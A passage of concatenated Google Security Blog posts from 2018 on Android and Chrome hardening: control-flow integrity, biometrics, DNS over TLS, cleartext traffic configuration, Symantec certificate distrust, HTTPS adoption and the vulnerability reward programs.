loads the object's vtable pointer and calls the function at the expected offset. With CFI enabled, it performs a fast-path first check to determine if the pointer falls within an expected range of addresses of compatible vtables. Failing that, execution falls through to a slow path that does a more extensive check for valid classes that are defined in other shared libraries. The slow path will abort execution if the vtable pointer points to an invalid target. With control flow tightly restricted to a small set of legitimate targets, code-reuse attacks become harder to utilize and some memory corruption vulnerabilities become more difficult or even impossible to exploit. In terms of performance impact, LLVM's CFI requires compiling with Link-Time Optimization (LTO). LTO preserves the LLVM bitcode representation of object files until link-time, which allows the compiler to better reason about what optimizations can be performed. Enabling LTO reduces the size of the final binary and improves performance, but increases compile time. In testing on Android, the combination of LTO and CFI results in negligible overhead to code size and performance; in a few cases both improved. For more technical details about CFI and how other forward-control checks are handled, see the LLVM design documentation. For Android P, CFI is enabled by default widely within the media frameworks and other security-critical components, such as NFC and Bluetooth. CFI kernel support has also been introduced into the Android common kernel when building with LLVM, providing the option to further harden the trusted computing base. This can be tested today on the HiKey reference boards. Integer Overflow SanitizationThe UndefinedBehaviorSanitizer's (UBSan) signed and unsigned integer overflow sanitization was first utilized when hardening the media stack in Android Nougat. This sanitization is designed to safely abort process execution if a signed or unsigned integer overflows by instrumenting arithmetic instructions which may overflow. The end result is the mitigation of an entire class of memory corruption and information disclosure vulnerabilities where the root cause is an integer overflow, such as the original Stagefright vulnerability. Because of their success, we've expanded usage of these sanitizers in the media framework with each release. Improvements have been made to LLVM's integer overflow sanitizers to reduce the performance impact by using fewer instructions in ARM 32-bit and removing unnecessary checks. In testing, these improvements reduced the sanitizers' performance overhead by over 75% in Android's 32-bit libstagefright library for some codecs. Improved Android build system support, such as better diagnostics support, more sensible crashes, and globally sanitized integer overflow targets for testing have also expedited the rollout of these sanitizers. We've prioritized enabling integer overflow sanitization in libraries where complex untrusted input is processed or where there have been security bulletin-level integer overflow vulnerabilities reported. As a result, in Android P the following libraries now benefit from this mitigation: libui libnl libmediaplayerservice libexif libdrmclearkeyplugin libreverbwrapper Future PlansMoving forward, we're expanding our use of these mitigation technologies and we strongly encourage vendors to do the same with their customizations. More information about how to enable and test these options will be available soon on the Android Open Source Project. Acknowledgements: This post was developed in joint collaboration with Vishwath Mohan, Jeffrey Vander Stoep, Joel Galenson, and Sami Tolvanen

Posted by Vishwath Mohan, Security Engineer[Cross-posted from the Android Developers Blog]To keep users safe, most apps and devices have an authentication mechanism, or a way to prove that you're you. These mechanisms fall into three categories: knowledge factors, possession factors, and biometric factors. Knowledge factors ask for something you know (like a PIN or a password), possession factors ask for something you have (like a token generator or security key), and biometric factors ask for something you are (like your fingerprint, iris, or face). Biometric authentication mechanisms are becoming increasingly popular, and it's easy to see why. They're faster than typing a password, easier than carrying around a separate security key, and they prevent one of the most common pitfalls of knowledge-factor based authentication—the risk of shoulder surfing. As more devices incorporate biometric authentication to safeguard people's private information, we're improving biometrics-based authentication in Android P by: Defining a better model to measure biometric security, and using that to functionally constrain weaker authentication methods. Providing a common platform-provided entry point for developers to integrate biometric authentication into their apps.A better security model for biometricsCurrently, biometric unlocks quantify their performance today with two metrics borrowed from machine learning (ML): False Accept Rate (FAR), and False Reject Rate (FRR). In the case of biometrics, FAR measures how often a biometric model accidentally classifies an incorrect input as belonging to the target user—that is, how often another user is falsely recognized as the legitimate device owner. Similarly, FRR measures how often a biometric model accidentally classifies the user's biometric as incorrect—that is, how often a legitimate device owner has to retry their authentication. The first is a security concern, while the second is problematic for usability. Both metrics do a great job of measuring the accuracy and precision of a given ML (or biometric) model when applied to random input samples. However, because neither metric accounts for an active attacker as part of the threat model, they do not provide very useful information about its resilience against attacks. In Android 8.1, we introduced two new metrics that more explicitly account for an attacker in the threat model: Spoof Accept Rate (SAR) and Imposter Accept Rate (IAR). As their names suggest, these metrics measure how easily an attacker can bypass a biometric authentication scheme. Spoofing refers to the use of a known-good recording (e.g. replaying a voice recording or using a face or fingerprint picture), while impostor acceptance means a successful mimicking of another user's biometric (e.g. trying to sound or look like a target user). Strong vs. Weak BiometricsWe use the SAR/IAR metrics to categorize biometric authentication mechanisms as either strong or weak. Biometric authentication mechanisms with an SAR/IAR of 7% or lower are strong, and anything above 7% is weak. Why 7% specifically? Most fingerprint implementations have a SAR/IAR metric of about 7%, making this an appropriate standard to start with for other modalities as well. As biometric sensors and classification methods improve, this threshold can potentially be decreased in the future. This binary classification is a slight oversimplification of the range of security that different implementations provide. However, it gives us a scalable mechanism (via the tiered authentication model) to appropriately scope the capabilities and the constraints of different biometric implementations across the ecosystem, based on the overall risk they pose. While both strong and weak biometrics will be allowed to unlock a device, weak biometrics: require the user to re-enter their primary PIN, pattern, password or a strong biometric to unlock a device after a 4-hour window of inactivity, such as when left at a desk or charger. This is in addition to the 72-hour timeout that is enforced for both strong and weak biometrics. are not supported by the forthcoming BiometricPrompt API, a common API for app developers to securely authenticate users on a device in a modality-agnostic way. can't authenticate payments or participate in other transactions that involve a KeyStore auth-bound key. must show users a warning that articulates the risks of using the biometric before it can be enabled.These measures are intended to allow weaker biometrics, while reducing the risk of unauthorized access. BiometricPrompt APIStarting in Android P, developers can use the BiometricPrompt API to integrate biometric authentication into their apps in a device and biometric agnostic way. BiometricPrompt only exposes strong modalities, so developers can be assured of a consistent level of security across all devices their application runs on. A support library is also provided for devices running Android O and earlier, allowing applications to utilize the advantages of this API across more devices . Here's a high-level architecture of BiometricPrompt. The API is intended to be easy to use, allowing the platform to select an appropriate biometric to authenticate with instead of forcing app developers to implement this logic themselves. Here's an example of how a developer might use it in their app: ConclusionBiometrics have the potential to both simplify and strengthen how we authenticate our digital identity, but only if they are designed securely, measured accurately, and implemented in a privacy-preserving manner. We want Android to get it right across all three. So we're combining secure design principles, a more attacker-aware measurement methodology, and a common, easy to use biometrics API that allows developers to integrate authentication in a simple, consistent, and safe manner. Acknowledgements: This post was developed in joint collaboration with Jim Miller

Posted by Giles Hogben, Privacy Engineer and Milinda Perera, Software Engineer [Cross-posted from the Android Developers Blog]Developers already use HTTPS to communicate with Firebase Cloud Messaging (FCM). The channel between FCM server endpoint and the device is encrypted with SSL over TCP. However, messages are not encrypted end-to-end (E2E) between the developer server and the user device unless developers take special measures. To this end, we advise developers to use keys generated on the user device to encrypt push messages end-to-end. But implementing such E2E encryption has historically required significant technical knowledge and effort. That is why we are excited to announce the Capillary open source library which greatly simplifies the implementation of E2E-encryption for push messages between developer servers and users' Android devices. We also added functionality for sending messages that can only be decrypted on devices that have recently been unlocked. This is designed to support for decrypting messages on devices using File-Based Encryption (FBE): encrypted messages are cached in Device Encrypted (DE) storage and message decryption keys are stored in Android Keystore, requiring user authentication. This allows developers to specify messages with sensitive content, that remain encrypted in cached form until the user has unlocked and decrypted their device. The library handles: Crypto functionality and key management across all versions of Android back to KitKat (API level 19). Key generation and registration workflows. Message encryption (on the server) and decryption (on the client). Integrity protection to prevent message modification. Caching of messages received in unauthenticated contexts to be decrypted and displayed upon device unlock. Edge-cases, such as users adding/resetting device lock after installing the app, users resetting app storage, etc.The library supports both RSA encryption with ECDSA authentication and Web Push encryption, allowing developers to re-use existing server-side code developed for sending E2E-encrypted Web Push messages to browser-based clients. Along with the library, we are also publishing a demo app (at last, the Google privacy team has its own messaging app!) that uses the library to send E2E-encrypted FCM payloads from a gRPC-based server implementation. What it's notThe open source library and demo app are not designed to support peer-to-peer messaging and key exchange. They are designed for developers to send E2E-encrypted push messages from a server to one or more devices. You can protect messages between the developer's server and the destination device, but not directly between devices. It is not a comprehensive server-side solution. While core crypto functionality is provided, developers will need to adapt parts of the sample server-side code that are specific to their architecture (for example, message composition, database storage for public keys, etc.)You can find more technical details describing how we've architected and implemented the library and demo here.

Posted by Shawn Willden, Staff Software Engineer [Cross-posted from the Android Developers Blog]Our smart devices, such as mobile phones and tablets, contain a wealth of personal information that needs to be kept safe. Google is constantly trying to find new and better ways to protect that valuable information on Android devices. From partnering with external researchers to find and fix vulnerabilities, to adding new features to the Android platform, we work to make each release and new device safer than the last. This post talks about Google's strategy for making the encryption on Google Pixel 2 devices resistant to various levels of attack—from platform, to hardware, all the way to the people who create the signing keys for Pixel devices. We encrypt all user data on Google Pixel devices and protect the encryption keys in secure hardware. The secure hardware runs highly secure firmware that is responsible for checking the user's password. If the password is entered incorrectly, the firmware refuses to decrypt the device. This firmware also limits the rate at which passwords can be checked, making it harder for attackers to use a brute force attack. To prevent attackers from replacing our firmware with a malicious version, we apply digital signatures. There are two ways for an attacker to defeat the signature checks and install a malicious replacement for firmware: find and exploit vulnerabilities in the signature-checking process or gain access to the signing key and get their malicious version signed so the device will accept it as a legitimate update. The signature-checking software is tiny, isolated, and vetted with extreme thoroughness. Defeating it is hard. The signing keys, however, must exist somewhere, and there must be people who have access to them. In the past, device makers have focused on safeguarding these keys by storing the keys in secure locations and severely restricting the number of people who have access to them. That's good, but it leaves those people open to attack by coercion or social engineering. That's risky for the employees personally, and we believe it creates too much risk for user data. To mitigate these risks, Google Pixel 2 devices implement insider attack resistance in the tamper-resistant hardware security module that guards the encryption keys for user data. This helps prevent an attacker who manages to produce properly signed malicious firmware from installing it on the security module in a lost or stolen device without the user's cooperation. Specifically, it is not possible to upgrade the firmware that checks the user's password unless you present the correct user password. There is a way to "force" an upgrade, for example when a returned device is refurbished for resale, but forcing it wipes the secrets used to decrypt the user's data, effectively destroying it. The Android security team believes that insider attack resistance is an important element of a complete strategy for protecting user data. The Google Pixel 2 demonstrated that it's possible to protect users even against the most highly-privileged insiders. We recommend that all mobile device makers do the same. For help, device makers working to implement insider attack resistance can reach out to the Android security team through their Google contact. Acknowledgements: This post was developed in joint collaboration with Paul Crowley, Senior Software Engineer

Posted by Sai Deep Tetali, Software Engineer, Google Play Protect[Cross-posted from the Android Developers Blog]At Google I/O 2017, we introduced Google Play Protect, our comprehensive set of security services for Android. While the name is new, the smarts powering Play Protect have protected Android users for years. Google Play Protect's suite of mobile threat protections are built into more than 2 billion Android devices, automatically taking action in the background. We're constantly updating these protections so you don't have to think about security: it just happens. Our protections have been made even smarter by adding machine learning elements to Google Play Protect. Security at scaleGoogle Play Protect provides in-the-moment protection from potentially harmful apps (PHAs), but Google's protections start earlier. Before they're published in Google Play, all apps are rigorously analyzed by our security systems and Android security experts. Thanks to this process, Android devices that only download apps from Google Play are 9 times less likely to get a PHA than devices that download apps from other sources. After you install an app, Google Play Protect continues its quest to keep your device safe by regularly scanning your device to make sure all apps are behaving properly. If it finds an app that is misbehaving, Google Play Protect either notifies you, or simply removes the harmful app to keep your device safe. Our systems scan over 50 billion apps every day. To keep on the cutting edge of security, we look for new risks in a variety of ways, such as identifying specific code paths that signify bad behavior, investigating behavior patterns to correlate bad apps, and reviewing possible PHAs with our security experts. In 2016, we added machine learning as a new detection mechanism and it soon became a critical part of our systems and tools. Training our machines In the most basic terms, machine learning means training a computer algorithm to recognize a behavior. To train the algorithm, we give it hundreds of thousands of examples of that behavior. In the case of Google Play Protect, we are developing algorithms that learn which apps are "potentially harmful" and which are "safe." To learn about PHAs, the machine learning algorithms analyze our entire catalog of applications. Then our algorithms look at hundreds of signals combined with anonymized data to compare app behavior across the Android ecosystem to find PHAs. They look for behavior common to PHAs, such as apps that attempt to interact with other apps on the device, access or share your personal data, download something without your knowledge, connect to phishing websites, or bypass built-in security features. When we find apps exhibit similar malicious behavior, we group them into families. Visualizing these PHA families helps us uncover apps that share similarities to known bad apps, but have yet remained under our radar. After we identify a new PHA, we confirm our findings with expert security reviews. If the app in question is a PHA, Google Play Protect takes action on the app and then we feed information about that PHA back into our algorithms to help find more PHAs. Doubling down on securitySo far, our machine learning systems have successfully detected 60.3% of the malware identified by Google Play Protect in 2017. In 2018, we're devoting a massive amount of computing power and talent to create, maintain and improve these machine learning algorithms. We're constantly leveraging artificial intelligence and our highly skilled researchers and engineers from all across Google to find new ways to keep Android devices safe and secure. In addition to our talented team, we work with the foremost security experts and researchers from around the world. These researchers contribute even more data and insights to keep Google Play Protect on the cutting edge of mobile security. To check out Google Play Protect, open the Google Play app and tap Play Protect in the left panel. Acknowledgements: This work was developed in joint collaboration with Google Play Protect, Safe Browsing and Play Abuse teams with contributions from Andrew Ahn, Hrishikesh Aradhye, Daniel Bali, Hongji Bao, Yajie Hu, Arthur Kaiser, Elena Kovakina, Salvador Mandujano, Melinda Miller, Rahul Mishra, Damien Octeau, Sebastian Porst, Chuangang Ren, Monirul Sharif, Sri Somanchi, Sai Deep Tetali, Zhikun Wang, and Mo Yu.

Posted by Jan Keller, Security TPMGoogle CTF 2017 was a big success! We had over 5,000 players, nearly 2,000 teams captured flags, we paid $31,1337.00, and most importantly: you had fun playing and we had fun hosting!Congratulations (for the second year) to the team pasten, from Israel, for scoring first place in both the quals and the finals. Also, for everyone who hasn’t played yet or wants to play again, we have open-sourced the 2017 challenges in our GitHub repository.Hence, we are excited to announce Google CTF 2018:Date and time: 00:00:01 UTC on June 23th and 24th, 2018Location: OnlinePrizes: Big checks, swag and rewards for creative write-upsThe winning teams will compete again for a spot at the Google CTF Finals later this year (more details on the Finals soon).For beginners and veterans alikeBased on the feedback we received, we plan to have additional challenges this year where people that may be new to CTFs or security can learn about, and try their hands at, some security challenges. These will be presented in a “Quest” style where there will be a scenario similar to a real world penetration testing environment. We hope that this will give people a chance to sharpen their skills, learn something new about CTFs and security, while allowing them to see a real world value to information security and its broader impact.We hope to virtually see you at the 3rd annual Google CTF on June 23rd 2018 at 00:00:01 UTC. Check g.co/ctf, or subscribe to our mailing list for more details, as they become available.Why do we host these competitions?We outlined our philosophy last year, but in short: we believe that the security community helps us better protect Google users, and so we want to nurture the community and give back in a fun way.Thirsty for more?There are a lot of opportunities for you to help us make the Internet a safer place:Our Vulnerability Rewards Program: Report vulnerabilities in our infrastructure and get rewarded(AutoFuzz) Patch Rewards Program: Fix vulnerabilities in open-source software to build your reputation and make an impact in the security communityVulnerability Research Grants Program: Apply for a research grant to extensively test a component of our infrastructure at your own pace.

Posted by Elie Bursztein, Anti-Abuse Research Lead - Ian Goodfellow, Adversarial Machine Learning Research LeadRecent advances in AI are transforming how we combat fraud and abuse and implement new security protections. These advances are critical to meeting our users’ expectations and keeping increasingly sophisticated attackers at bay, but they come with brand new challenges as well.This week at RSA, we explored the intersection between AI, anti-abuse, and security in two talks.Our first talk provided a concise overview of how we apply AI to fraud and abuse problems. The talk started by detailing the fundamental reasons why AI is key to building defenses that keep up with user expectations and combat increasingly sophisticated attacks. It then delved into the top 10 anti-abuse specific challenges encountered while applying AI to abuse fighting and how to overcome them. Check out the infographic at the end of the post for a quick overview of the challenges we covered during the talk.Our second talk looked at attacks on ML models themselves and the ongoing effort to develop new defenses.It covered attackers’ attempts to recover private training data, to introduce examples into the training set of a machine learning model to cause it to learn incorrect behaviors, to modify the input that a machine learning model receives at classification time to cause it to make a mistake, and more.Our talk also looked at various defense solutions, including differential privacy, which provides a rigorous theoretical framework for preventing attackers from recovering private training data.Hopefully you were to able to join us at RSA! But if not, here is re-recording and the slides of our first talk on applying AI to abuse-prevention, along with the slides from our second talk about protecting ML models.

Posted by Erik Kline, Android software engineer, and Ben Schwartz, Jigsaw software engineer[Cross-posted from the Android Developers Blog]The first step of almost every connection on the internet is a DNS query. A client, such as a smartphone, typically uses a DNS server provided by the Wi-Fi or cellular network. The client asks this DNS server to convert a domain name, like www.google.com, into an IP address, like 2607:f8b0:4006:80e::2004. Once the client has the IP address, it can connect to its intended destination.When the DNS protocol was designed in the 1980s, the internet was a much smaller, simpler place. For the past few years, the Internet Engineering Task Force (IETF) has worked to define a new DNS protocol that provides users with the latest protections for security and privacy. The protocol is called "DNS over TLS" (standardized as RFC 7858).Like HTTPS, DNS over TLS uses the TLS protocol to establish a secure channel to the server. Once the secure channel is established, DNS queries and responses can't be read or modified by anyone else who might be monitoring the connection. (The secure channel only applies to DNS, so it can't protect users from other kinds of security and privacy violations.)DNS over TLS in PThe Android P Developer Preview includes built-in support for DNS over TLS. We added a Private DNS mode to the Network & internet settings.By default, devices automatically upgrade to DNS over TLS if a network's DNS server supports it. But users who don't want to use DNS over TLS can turn it off.Users can enter a hostname if they want to use a private DNS provider. Android then sends all DNS queries over a secure channel to this server or marks the network as "No internet access" if it can't reach the server. (For testing purposes, see this community-maintained list of compatible servers.)DNS over TLS mode automatically secures the DNS queries from all apps on the system. However, apps that perform their own DNS queries, instead of using the system's APIs, must ensure that they do not send insecure DNS queries when the system has a secure connection. Apps can get this information using a new API: LinkProperties.isPrivateDnsActive()With the Android P Developer Preview, we're proud to present built-in support for DNS over TLS. In the future, we hope that all operating systems will include secure transports for DNS, to provide better protection and privacy for all users on every new connection.

Posted by Chad Brubaker, Senior Software Engineer Android Security[Cross-posted from the Android Developers Blog]Android is committed to keeping users, their devices, and their data safe. One of the ways that we keep data safe is by protecting all data that enters or leaves an Android device with Transport Layer Security (TLS) in transit. As we announced in our Android P developer preview, we're further improving these protections by preventing apps that target Android P from allowing unencrypted connections by default.This follows a variety of changes we've made over the years to better protect Android users. To prevent accidental unencrypted connections, we introduced the android:usesCleartextTraffic manifest attribute in Android Marshmallow. In Android Nougat, we extended that attribute by creating the Network Security Config feature, which allows apps to indicate that they do not intend to send network traffic without encryption. In Android Nougat and Oreo, we still allowed cleartext connections.How do I update my app?If your app uses TLS for all connections then you have nothing to do. If not, update your app to use TLS to encrypt all connections. If you still need to make cleartext connections, keep reading for some best practices.Why should I use TLS?Android considers all networks potentially hostile and so encrypting traffic should be used at all times, for all connections. Mobile devices are especially at risk because they regularly connect to many different networks, such as the Wi-Fi at a coffee shop.All traffic should be encrypted, regardless of content, as any unencrypted connections can be used to inject content, increase attack surface for potentially vulnerable client code, or track the user. For more information, see our past blog post and Developer Summit talk.Isn't TLS slow?No, it's not.How do I use TLS in my app?Once your server supports TLS, simply change the URLs in your app and server responses from http:// to https://. Your HTTP stack handles the TLS handshake without any more work.If you are making sockets yourself, use an SSLSocketFactory instead of a SocketFactory. Take extra care to use the socket correctly as SSLSocket doesn't perform hostname verification. Your app needs to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further, beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.I need to use cleartext traffic toWhile you should use TLS for all connections, it's possibly that you need to use cleartext traffic for legacy reasons, such as connecting to some servers. To do this, change your app's network security config to allow those connections.We've included a couple example configurations. See the network security config documentation for a bit more help.Allow cleartext connections to a specific domainIf you need to allow connections to a specific domain or set of domains, you can use the following config as a guide:<network-security-config> <domain-config cleartextTrafficPermitted="true"> <domain includeSubdomains="true">insecure.example.com</domain> <domain includeSubdomains="true">insecure.cdn.example.com</domain> </domain-config></network-security-config>Allow connections to arbitrary insecure domainsIf your app supports opening arbitrary content from URLs over insecure connections, you should disable cleartext connections to your own services while supporting cleartext connections to arbitrary hosts. Keep in mind that you should be cautious about the data received over insecure connections as it could have been tampered with in transit.<network-security-config> <domain-config cleartextTrafficPermitted="false"> <domain includeSubdomains="true">example.com</domain> <domain includeSubdomains="true">cdn.example2.com</domain> </domain-config> <base-config cleartextTrafficPermitted="true" /></network-security-config>How do I update my library?If your library directly creates secure/insecure connections, make sure that it honors the app's cleartext settings by checking isCleartextTrafficPermitted before opening any cleartext connection.

Posted by Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOSOur team’s goal is simple: secure more than two billion Android devices. It’s our entire focus, and we’re constantly working to improve our protections to keep users safe.Today, we’re releasing our fourth annual Android Security Year in Review. We compile these reports to help educate the public about the many different layers of Android security, and also to hold ourselves accountable so that anyone can track our security work over time.We saw really positive momentum last year and this post includes some, but not nearly all, of the major moments from 2017. To dive into all the details, you can read the full report at: g.co/AndroidSecurityReport2017Google Play ProtectIn May, we announced Google Play Protect, a new home for the suite of Android security services on nearly two billion devices. While many of Play Protect’s features had been securing Android devices for years, we wanted to make these more visible to help assure people that our security protections are constantly working to keep them safe.Play Protect’s core objective is to shield users from Potentially Harmful Apps, or PHAs. Every day, it automatically reviews more than 50 billion apps, other potential sources of PHAs, and devices themselves and takes action when it finds any.Play Protect uses a variety of different tactics to keep users and their data safe, but the impact of machine learning is already quite significant: 60.3% of all Potentially Harmful Apps were detected via machine learning, and we expect this to increase in the future.Protecting users' devicesPlay Protect automatically checks Android devices for PHAs at least once every day, and users can conduct an additional review at any time for some extra peace of mind. These automatic reviews enabled us to remove nearly 39 million PHAs last year.We also update Play Protect to respond to trends that we detect across the ecosystem. For instance, we recognized that nearly 35% of new PHA installations were occurring when a device was offline or had lost network connectivity. As a result, in October 2017, we enabled offline scanning in Play Protect, and have since prevented 10 million more PHA installs.Preventing PHA downloadsDevices that downloaded apps exclusively from Google Play were nine times less likely to get a PHA than devices that downloaded apps from other sources. And these security protections continue to improve, partially because of Play Protect’s increased visibility into newly submitted apps to Play. It reviewed 65% more Play apps compared to 2016.Play Protect also doesn’t just secure Google Play—it helps protect the broader Android ecosystem as well. Thanks in large part to Play Protect, the installation rates of PHAs from outside of Google Play dropped by more than 60%.Security updatesWhile Google Play Protect is a great shield against harmful PHAs, we also partner with device manufacturers to make sure that the version of Android running on users' devices is up-to-date and secure.Throughout the year, we worked to improve the process for releasing security updates, and 30% more devices received security patches than in 2016. Furthermore, no critical security vulnerabilities affecting the Android platform were publicly disclosed without an update or mitigation available for Android devices. This was possible due to the Android Security Rewards Program, enhanced collaboration with the security researcher community, coordination with industry partners, and built-in security features of the Android platform.New security features in Android OreoWe introduced a slew of new security features in Android Oreo: making it safer to get apps, dropping insecure network protocols, providing more user control over identifiers, hardening the kernel, and more.We highlighted many of these over the course of the year, but some may have flown under the radar. For example, we updated the overlay API so that apps can no longer block the entire screen and prevent you from dismissing them, a common tactic employed by ransomware.Openness makes Android security strongerWe’ve long said it, but it remains truer than ever: Android’s openness helps strengthen our security protections. For years, the Android ecosystem has benefitted from researchers’ findings, and 2017 was no different.Security reward programsWe continued to see great momentum with our Android Security Rewards program: we paid researchers $1.28 million dollars, pushing our total rewards past $2 million dollars since the program began. We also increased our top-line payouts for exploits that compromise TrustZone or Verified Boot from $50,000 to $200,000, and remote kernel exploits from $30,000 to $150,000.In parallel, we introduced Google Play Security Rewards Program and offered a bonus bounty to developers that discover and disclose select critical vulnerabilities in apps hosted on Play to their developers.External security competitionsOur teams also participated in external vulnerability discovery and disclosure competitions, such as Mobile Pwn2Own. At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel. And of the exploits demonstrated against devices running Android, none could be reproduced on a device running unmodified Android source code from the Android Open Source Project (AOSP).We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users.

Posted by Devon O’Brien, Ryan Sleevi, Emily Stark, Chrome security teamWe previously announced plans to deprecate Chrome’s trust in the Symantec certificate authority (including Symantec-owned brands like Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL). This post outlines how site operators can determine if they’re affected by this deprecation, and if so, what needs to be done and by when. Failure to replace these certificates will result in site breakage in upcoming versions of major browsers, including Chrome.Chrome 66If your site is using a SSL/TLS certificate from Symantec that was issued before June 1, 2016, it will stop functioning in Chrome 66, which could already be impacting your users.If you are uncertain about whether your site is using such a certificate, you can preview these changes in Chrome Canary to see if your site is affected. If connecting to your site displays a certificate error or a warning in DevTools as shown below, you’ll need to replace your certificate. You can get a new certificate from any trusted CA, including Digicert, which recently acquired Symantec’s CA business.An example of a certificate error that Chrome 66 users might see if you are using a Legacy Symantec SSL/TLS certificate that was issued before June 1, 2016. The DevTools message you will see if you need to replace your certificate before Chrome 66.Chrome 66 has already been released to the Canary and Dev channels, meaning affected sites are already impacting users of these Chrome channels. If affected sites do not replace their certificates by March 15, 2018, Chrome Beta users will begin experiencing the failures as well. You are strongly encouraged to replace your certificate as soon as possible if your site is currently showing an error in Chrome Canary.Chrome 70Starting in Chrome 70, all remaining Symantec SSL/TLS certificates will stop working, resulting in a certificate error like the one shown above. To check if your certificate will be affected, visit your site in Chrome today and open up DevTools. You’ll see a message in the console telling you if you need to replace your certificate.The DevTools message you will see if you need to replace your certificate before Chrome 70.If you see this message in DevTools, you’ll want to replace your certificate as soon as possible. If the certificates are not replaced, users will begin seeing certificate errors on your site as early as July 20, 2018. The first Chrome 70 Beta release will be around September 13, 2018.Expected Chrome Release TimelineThe table below shows the First Canary, First Beta and Stable Release for Chrome 66 and 70. The first impact from a given release will coincide with the First Canary, reaching a steadily widening audience as the release hits Beta and then ultimately Stable. Site operators are strongly encouraged to make the necessary changes to their sites before the First Canary release for Chrome 66 and 70, and no later than the corresponding Beta release dates.ReleaseFirst CanaryFirst BetaStable ReleaseChrome 66January 20, 2018~ March 15, 2018~ April 17, 2018Chrome 70~ July 20, 2018~ September 13, 2018~ October 16, 2018For information about the release timeline for a particular version of Chrome, you can also refer to the Chromium Development Calendar which will be updated should release schedules change.In order to address the needs of certain enterprise users, Chrome will also implement an Enterprise Policy that allows disabling the Legacy Symantec PKI distrust starting with Chrome 66. As of January 1, 2019, this policy will no longer be available and the Legacy Symantec PKI will be distrusted for all users.Special Mention: Chrome 65As noted in the previous announcement, SSL/TLS certificates from the Legacy Symantec PKI issued after December 1, 2017 are no longer trusted. This should not affect most site operators, as it requires entering in to special agreement with DigiCert to obtain such certificates. Accessing a site serving such a certificate will fail and the request will be blocked as of Chrome 65. To avoid such errors, ensure that such certificates are only served to legacy devices and not to browsers such as Chrome.

Posted by Emily Schechter, Chrome Security Product ManagerFor the past several years, we’ve moved toward a more secure web by strongly advocating that sites adopt HTTPS encryption. And within the last year, we’ve also helped users understand that HTTP sites are not secure by gradually marking a larger subset of HTTP pages as “not secure”. Beginning in July 2018 with the release of Chrome 68, Chrome will mark all HTTP sites as “not secure”.In Chrome 68, the omnibox will display “Not secure” for all HTTP pages.Developers have been transitioning their sites to HTTPS and making the web safer for everyone. Progress last year was incredible, and it’s continued since then:Over 68% of Chrome traffic on both Android and Windows is now protectedOver 78% of Chrome traffic on both Chrome OS and Mac is now protected81 of the top 100 sites on the web use HTTPS by defaultChrome is dedicated to making it as easy as possible to set up HTTPS. Mixed content audits are now available to help developers migrate their sites to HTTPS in the latest Node CLI version of Lighthouse, an automated tool for improving web pages. The new audit in Lighthouse helps developers find which resources a site loads using HTTP, and which of those are ready to be upgraded to HTTPS simply by changing the subresource reference to the HTTPS version.Lighthouse is an automated developer tool for improving web pages.Chrome’s new interface will help users understand that all HTTP sites are not secure, and continue to move the web towards a secure HTTPS web by default. HTTPS is easier and cheaper than ever before, and it unlocks both performance improvements and powerful new features that are too sensitive for HTTP. Developers, check out our set-up guides to get started.

Posted by Jan Keller, Google VRP Technical Pwning MasterAs we kick-off a new year, we wanted to take a moment to look back at the Vulnerability Reward Program in 2017. It joins our past retrospectives for 2014, 2015, and 2016, and shows the course our VRPs have taken.At the heart of this blog post is a big thank you to the security research community. You continue to help make Google’s users and our products more secure. We looking forward to continuing our collaboration with the community in 2018 and beyond!2017, By the NumbersHere’s an overview of how we rewarded researchers for their reports to us in 2017:We awarded researchers more than 1 million dollars for vulnerabilities they found and reported in Google products, and a similar amount for Android as well. Combined with our Chrome awards, we awarded nearly 3 million dollars to researchers for their reports last year, overall.Drilling-down a bit further, we awarded $125,000 to more than 50 security researchers from all around the world through our Vulnerability Research Grants Program, and $50,000 to the hard-working folks who improve the security of open-source software as part of our Patch Rewards Program.A few bug highlightsEvery year, a few bug reports stand out: the research may have been especially clever, the vulnerability may have been especially serious, or the report may have been especially fun and quirky!Here are a few of our favorites from 2017:In August, researcher Guang Gong outlined an exploit chain on Pixel phones which combined a remote code execution bug in the sandboxed Chrome render process with a subsequent sandbox escape through Android’s libgralloc. As part of the Android Security Rewards Program he received the largest reward of the year: $112,500. The Pixel was the only device that wasn’t exploited during last year’s annual Mobile pwn2own competition, and Guang’s report helped strengthen its protections even further.Researcher "gzobqq" received the $100,000 pwnium award for a chain of bugs across five components that achieved remote code execution in Chrome OS guest mode.Alex Birsan discovered that anyone could have gained access to internal Google Issue Tracker data. He detailed his research here, and we awarded him $15,600 for his efforts.Making Android and Play even saferOver the course of the year, we continued to develop our Android and Play Security Reward programs.No one had claimed the top reward for an Android exploit chain in more than two years, so we announced that the greatest reward for a remote exploit chain--or exploit leading to TrustZone or Verified Boot compromise--would increase from $50,000 to $200,000. We also increased the top-end reward for a remote kernel exploit from $30,000 to $150,000.In October, we introduced the by-invitation-only Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play.Today, we’re expanding the range of rewards for remote code executions from $1,000 to $5,000. We’re also introducing a new category that includes vulnerabilities that could result in the theft of users’ private data, information being transferred unencrypted, or bugs that result in access to protected app components. We’ll award $1,000 for these bugs. For more information visit the Google Play Security Reward Program site.And finally, we want to give a shout out to the researchers who’ve submitted fuzzers to the Chrome Fuzzer Program: they get rewards for every eligible bug their fuzzers find without having to do any more work, or even filing a bug.Given how well things have been going these past years, we look forward to our Vulnerability Rewards Programs resulting in even more user protection in 2018 thanks to the hard work of the security research community.* Andrew Whalley (Chrome VRP), Mayank Jain (Android Security Rewards), and Renu Chaudhary (Google Play VRP) contributed mightily to help lead these Google-wide efforts.

Posted by Alex Wozniak, Software Engineer, Safe Browsing TeamIn May 2016, we introduced the latest version of the Google Safe Browsing API (v4). Since this launch, thousands of developers around the world have adopted the API to protect over 3 billion devices from unsafe web resources.Coupled with that announcement was the deprecation of legacy Safe Browsing APIs, v2 and v3. Today we are announcing an official turn-down date of October 1st, 2018, for these APIs. All v2 and v3 clients must transition to the v4 API prior to this date.To make the switch easier, an open source implementation of the Update API (v4) is available on GitHub. Android developers always get the latest version of Safe Browsing’s data and protocols via the SafetyNet Safe Browsing API. Getting started is simple; all you need is a Google Account, Google Developer Console project, and an API key.For questions or feedback, join the discussion with other developers on the Safe Browsing Google Group. Visit our website for the latest information on Safe Browsing.

